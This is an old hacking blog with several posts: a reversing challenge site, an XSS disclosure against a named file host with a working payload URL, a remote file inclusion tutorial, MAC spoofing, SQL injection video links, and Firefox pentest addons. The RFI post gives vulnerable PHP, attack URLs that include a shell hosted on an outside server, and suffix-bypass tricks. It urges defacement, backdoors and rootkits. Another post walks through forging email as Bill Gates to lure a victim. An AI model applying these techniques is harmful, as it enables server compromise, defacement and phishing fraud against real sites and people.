
Wednesday 15 September 2010

Nepali Hack Challenge Site

I had to develop a reversing challenge site for KU IT Meet 2010, organized by Kathmandu University Computer Club in IT Park, Panauti Road. The challenge was done by a few great hackers from Nepal like fr3ak, dpac_, etc., and they finished around 90% of the challenges. But other users were far behind in the challenge, so now I want to make this challenge open for everyone.

If you want to participate in the reversing challenge, you can visit www.nepali.netau.net. The site is pretty basic in its interface and design, as it had to be done very quickly. But still, this site might prove useful for some of you to learn hacking, as the challenges on the site will guide you to read the related hacking and security articles by searching on your own on Google. So I hope you will have fun doing these challenges.


If you need any sort of help regarding the challenges, you can always contact me. Best of luck for the challenges.


Sunday 12 September 2010

Ziddu.com Vulnerable to XSS

Today, I was trying to download a file from Ziddu and, since the author had already deleted the file, I was redirected to the error message page. And I thought of playing around with the message from the GET params which was being displayed in the page.

I first added <i> and </i> in between the message and found that the HTML tags were not being filtered. Then I used the <script> tag and tried to do the alert, but they were adding backslashes to the single and double quotes...
Then I used the String.fromCharCode() JS function and the alert appeared on the site..

http://www.ziddu.com/errortracking.php?msg=%3Cscript%3Ealert%28String.fromCharCode%2883,65,77,65,82%29%29;%3C/script%3E

Ziddu.com suffers from XSS and I've notified them.
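The pattern described above (quotes backslash-escaped, tags echoed unchanged) beside the fix that actually stops it, as an added example that is not Ziddu's code; the function names and the <p> wrapper are hypothetical.

```php
<?php
// Added example, not Ziddu's code: the pattern the post describes versus a
// hardened version. Function names and the <p> wrapper are hypothetical.

// Observed behaviour: quotes get backslash-escaped (what addslashes or the
// old magic_quotes_gpc setting do), but < and > are echoed unchanged, so a
// payload that needs no quotes, like String.fromCharCode(...), still runs.
function render_message_vulnerable(string $msg): string
{
    return '<p>' . addslashes($msg) . '</p>';
}

// Hardened: encode for the HTML context instead of escaping for SQL.
// ENT_QUOTES turns <, >, &, " and ' into entities, so no tag is created.
function render_message_safe(string $msg): string
{
    return '<p>' . htmlspecialchars($msg, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</p>';
}

// Regression check: true when the rendered HTML contains no raw tag.
function contains_no_tag(string $html): bool
{
    // Strip the fixed <p>...</p> wrapper, then look for anything tag-like.
    $inner = substr($html, 3, -4);
    return preg_match('/<\s*\/?\s*[a-z]/i', $inner) === 0;
}

// Constructed input: the decoded payload from the URL quoted in the post.
$payload = '<script>alert(String.fromCharCode(83,65,77,65,82));</script>';

echo render_message_vulnerable($payload), PHP_EOL;
echo render_message_safe($payload), PHP_EOL;

// The vulnerable rendering still carries a <script> tag; the safe one
// carries only entities, so the check fails for the first and passes for the second.
var_dump(contains_no_tag(render_message_vulnerable($payload)));
var_dump(contains_no_tag(render_message_safe($payload)));
```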


Monday 6 September 2010

Steal your buddy's MSN display pic

I don't know how well this works, but it worked well for me... Extra note: I'm using the msgplus addon on my Windows Live, so I am not sure about the native Windows Live Messenger. Anyway, I thought it would be worth sharing here.


I was actually looking for the malware that was apparently running from the temporary folder of my computer. So I went to the temporary folder by typing

%temp%

There I found the folder MessengerCache and then, to kill my curiosity, I browsed inside the folder and found some files with their names in (probably) base64-encoded format, like:

5MUxRvUiwvrxjV2LPv16yrBUhKs=
fffaxlzPZXqjTQMBjaQqrIhOQtc=
RMsNq5KjYXJA2LKOCzpJX2FY4Wzo=
etc...

I then opened one of these files in Notepad++ and found the start of the file containing

GIF89a

which is something like the header for GIF images. Immediately I renamed the file to .gif and, when I viewed it, I found it to be the display pic of one of the friends in my buddy list. I hope you got me... This is something like stealing a buddy's display pic. Have fun. :)


Sunday 29 August 2010

Basics of Remote File Inclusion [RFI]

This time, I am going to give you information about the remote file inclusion vulnerability in web pages, which can be exploited to root and mass-deface the server.
First, let me say what remote file inclusion (RFI) is... A file inclusion vulnerability is the result of poor and insecure programming practice which allows us to include files in the website's PHP scripts. Now, whenever I say remote file inclusion, the file that is going to be included is from a different server. Simply put, you would include some evil file with malicious code from another server in the victim site you are hacking. Such an evil file is called a shell and should be in .txt format so as to get executed in the victim site. There are numerous shells available on the internet. Google for r57 or c99 shell and you should get the shells. Now you need to upload these shells to a server (free hosting providers) with the .txt extension.


Let me suppose I am browsing a site www.victim.com and notice in the URL (in the address bar) that one of the GET arguments is index.php?page=home.php. I click on a link and it changes to index.php?page=game.php

    Example:

        http://www.victim.com/index.php?page=home.php
        http://www.victim.com/index.php?page=game.php

Let me show you the code for index.php that makes it vulnerable to RFI.


    <?php
     // Vulnerable: the page name is taken straight from the query string
     $mypage=$_GET['page'];
     // and passed to include() unchecked, so any local path or remote URL works
     include($mypage);
    ?>

So, the code sets $mypage to $_GET['page'], and whenever we go to http://www.victim.com/index.php?page=game.php, the game.php file is included by the include() function, i.e. the content of game.php is pasted into index.php.
But this allows a malicious attacker to include remote files as well. I mean, if you put:

    http://www.victim.com/index.php?page=http://www.yoursite.com

you will see the content of your site on the victim site.

Now that you've got the idea of remote file inclusion, it's time to exploit it. So we use evil scripts called shells, which provide us an interface for viewing, deleting and editing files, getting server info and much more.

Say I've uploaded my shell to a free hosting provider and the URL (location) of my shell is http://www.hacky0u.free.com/lol.txt; I would do:


    http://www.victim.com/index.php?page=http://www.hacky0u.free.com/lol.txt

Now, with this I get a shell on the server and can do anything from deleting files to stealing information from there.
But sometimes, programmers write code like below:


    <?php
     $mypage=$_GET['page'];
     // Still vulnerable: appending ".php" does not stop remote URLs, because
     // a trailing "?" or a null byte in the input neutralises the suffix
     include($mypage.".php");
    ?>

So if we have index.php?page=game, the game.php file gets included. This seems to include only PHP files, and our .txt shell file won't get included; instead it would include lol.txt.php, making us fail. But if we add a "?" at the end, this gets bypassed and we can still gain a shell, because the appended ".php" then becomes part of the query string of the remote URL rather than part of the file name. Similarly, if ? doesn't work, you can inject a null byte in place of the ?, which denotes the end of the string.

    Example: http://www.victim.com/index.php?page=http://www.hacky0u.free.com/lol.txt?

After getting a shell, we may delete files, do mass defacements, gain root access using root exploits, keep backdoors, install r00tkits, etc. Seems elite, but you can learn all these things.
Now, something about avoiding RFI... If you are a web programmer, then you should know the switch-case-default statement. Use it for navigation to the pages instead of the scripts shown above. Switch is simple yet the best solution.
Learn it, hack it and enjoy it...
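The switch-case-default fix recommended above, written out as an added example (not code from the original post); the page names and the pages/ directory are hypothetical.

```php
<?php
// Added example, not code from the original post: the index.php from the
// post rewritten with the switch-case-default whitelist the post recommends.
// The page names and the pages/ directory are hypothetical.

// Map each allowed value of ?page= to a fixed local file. The included path
// never contains attacker-controlled text, so a remote URL, a trailing "?"
// or a null byte in the request cannot change what gets included.
function resolve_page(string $requested): string
{
    switch ($requested) {
        case 'home':
            return __DIR__ . '/pages/home.php';
        case 'game':
            return __DIR__ . '/pages/game.php';
        default:
            // Unknown or tampered value: fall back to a known page.
            return __DIR__ . '/pages/home.php';
    }
}

// Constructed inputs, including the bypass attempts discussed in the post.
$attempts = [
    'game',
    'http://www.hacky0u.free.com/lol.txt?',
    "game\0",
    '../../etc/passwd',
];
foreach ($attempts as $attempt) {
    // Show the null byte visibly as \000 so the line is readable.
    printf("%-40s -> %s\n", addcslashes($attempt, "\0"), resolve_page($attempt));
}

// In a real index.php you would then write:
//   include resolve_page($_GET['page'] ?? 'home');
// Defence in depth: allow_url_include=Off in php.ini (the default) makes
// include() refuse http:// paths even if the whitelist is ever bypassed.
```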


Download Spicenepal/Ncell PRBT tones

I was browsing the site of Mero Mobile (www.spicenepal.com) quite a long time ago and was checking the caller ring back tones. Though it's not any kind of hack, if you guys love some wav tones on the site and want to download the ring back tones, I have come up with a solution for you.


First navigate to:


Now you will see a page that shows "forbidden" etc. Anyway, now navigate to:


You will get a directory listing. Now go to each folder and download the wav tones.
Some sample links are:

http://prbt.spicenepal.com:9998/colorring/al/600/001/0/0000/0001/
http://prbt.spicenepal.com:9998/colorring/al/600/001/0/0000/0000/
http://prbt.spicenepal.com:9998/colorring/rl/600/001/0/0000/0000/
http://prbt.spicenepal.com:9998/colorring/rl/600/001/0/0000/0001/

You will get a list of wav files; listen to them and download them.
I am sorry if a download link already exists on the site, but if not, this might help you. Hope this helps some of you guys out there.
Thanks.


Changing MAC address in Linux

Previously I had posted on changing the MAC address in Windows, but what if you want to change the MAC address in your Linux distro? As I said in the previous post, MAC spoofing can be great for networks with MAC-based restrictions.

There's a utility called ifconfig in Linux which can be used to view and configure the network interfaces in your Linux distro. The following shows how you can view the MAC address of an interface and then how you can modify it.

ifconfig -a | grep HWaddr
# This will display the hardware address i.e. MAC of your machine.

Next, enter the following commands on your Linux box, logged in as the root user.

ifconfig eth0 down
ifconfig eth0 hw ether 00:1E:90:E9:77:D7
ifconfig eth0 up
# This will change the hardware address i.e. MAC of your machine.

Now you can view your changed MAC by again entering the command:

ifconfig -a | grep HWaddr
# This will display the hardware address i.e. MAC of your machine.

This is how you can use the ifconfig command to configure the MAC for your interface (eth0 in this case). But there also exists a tool called GNU MAC Changer, which can be used for viewing and manipulating the MAC address of network interfaces. You can download this utility from HERE. That page also lists the proper instructions for using the utility.

I hope you find this post useful.


Saturday 28 August 2010

Blind SQL Injection video

Previously I had posted a video tutorial on basic SQL injection, which presented the basics of SQL injection in MySQL-backed PHP web applications. This time, I've uploaded one of my old videos, and that's on blind SQL injection.

Blind SQL Injection Video Tutorial

Be sure to comment on this tutorial.


Tuesday 24 August 2010

Basic SQL injection video by Me

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.

I had made a simple video demonstrating the basics of SQL injection attacks on my own localhost, and now I've uploaded it for you.
Basic SQL Injection Video By Sam207

Enjoy. I'll be uploading other videos of mine.


Monday 23 August 2010

Spoofing your MAC address in Windows

A Media Access Control address (MAC address) is a unique identifier assigned to network adapters or network interface cards (NICs), usually by the manufacturer, for identification. It may also be known as an Ethernet Hardware Address (EHA), hardware address, adapter address, or physical address. In many networks, MAC-address-based filtering is applied, and this can be easily bypassed by spoofing the MAC address.


To spoof the MAC address of your PC on a wireless or wired LAN, you can use the software called MACMakeUp.

Download it HERE

To find your original MAC address, just type ipconfig /all and you will see the physical address as 6 hex pairs. In order to spoof the MAC address, enter the new MAC address after running the Mac Makeup program.



Saturday 21 August 2010

Sending Fake Emails Using Telnet to SMTP Server

In this tutorial I am going to show you how to send fake emails by telnetting to the mail server. We will be using the telnet client (which comes along with Windows), and you should know about telnet. To know more about telnet, please use Google (or I may write a tutorial on it).
Sending forged emails is very easy: we connect to the remote mail server and use the mail daemon running on the remote host to send the fake mails.

First open the command prompt and type 'telnet' (without quotes), then hit enter. You will be welcomed by Microsoft Telnet. Now we have to connect to the mail daemon through the specific port that has the SMTP service on. Usually, the SMTP port is 25, but that may differ; I also find ports 26 and 587 used frequently for the SMTP service.

For my example, let's say www.mailserver.com is providing SMTP mail service through port 25.
First I connect to the mail server by issuing the following command in the telnet client.

o www.mailserver.com 25

This establishes a remote connection with port 25 at mailserver.com.
After a successful connection, I am shown the SMTP info.
It's always a good idea to ask the mail daemon for help, so first issue HELP to see the supported commands.
Then we introduce ourselves to the mail daemon by issuing the HELO command, and after a successful HELO command, we input the sender email using the 'mail from:' (without quotes) command.
Then we enter the recipient's address using the 'rcpt to:' (without quotes) command.
Now we enter our actual data using the DATA command. Within DATA, you can use the SUBJECT: header to enter the subject of the email.
Finally, we end our data by entering a . (full stop) on a line by itself. This sends the forged mail through that mail server.

Now let me show a session of email forging, from which you can be more clear.
First, I open the command prompt and go to the telnet client by typing telnet. Below is the session:

Microsoft Telnet>o www.mailserver.com 25
220 mailserver.com ESMTP Sendmail Version 8.x.x; Mon, 28 Sept. 2008;
We do not allow to send fake or bulk emails...
helo microsoft.com
250 mailserver.com Hello Nice to meet you..
mail from:billgates@microsoft.com
250 billgates@microsoft.com Sender Ok
rcpt to:victim@victim.com
250 victim@victim.com Recipient Ok
data
354 Enter mail, end with "." on a line by itself..
SUBJECT:Hello!
Hello,
I am Bill Gates, the chairman of Microsoft. I would like to offer you a job for Microsoft Corporation. If you are interested to work with Microsoft, then reply me at my mail address.
Regards~
Bill Gates
.

250 2.0.0 iF3NDLS240106 Message Accepted For Delivery.

This was the session of sending the forged mail from billgates@microsoft.com to victim@victim.com.

I hope you understood the log. So this was my little tutorial on sending forged mails.
The art of sending forged mails can be extended to send file attachments and to use multiple recipients.


Some Useful Mozilla Addons For Hackers

Hi there, this time I am going to inform you about some of the useful plugins available for Mozilla Firefox. Mozilla Firefox is a very good browser and it has tons of plugins that you can use to enhance its capabilities. Among them, I am going to provide you information about some of the useful plugins for web pen-testing, especially useful for beginners.



User Agent Switcher: This plugin allows us to change the user agent and provide fake information to the site. Visit http://www.chrispederick.com/work/user-agent-switcher/


Firebug: Its tagline is "Web Development Evolved", and it is a very useful addon for web developers as well. Visit http://www.getfirebug.com/ for downloads and more.


Greasemonkey: It is used to automate the manipulation of target websites with Greasemonkey scripts. A great site for Greasemonkey scripts is http://userscripts.org


RefControl: It is an extension used to modify the HTTP referer sent to sites. Visit http://www.stardrifter.org/refcontrol


Hackbar: A useful plugin with various options for hexing, injection, XSS, etc.

More plugins that I love will be explained in another post. Stay tuned...
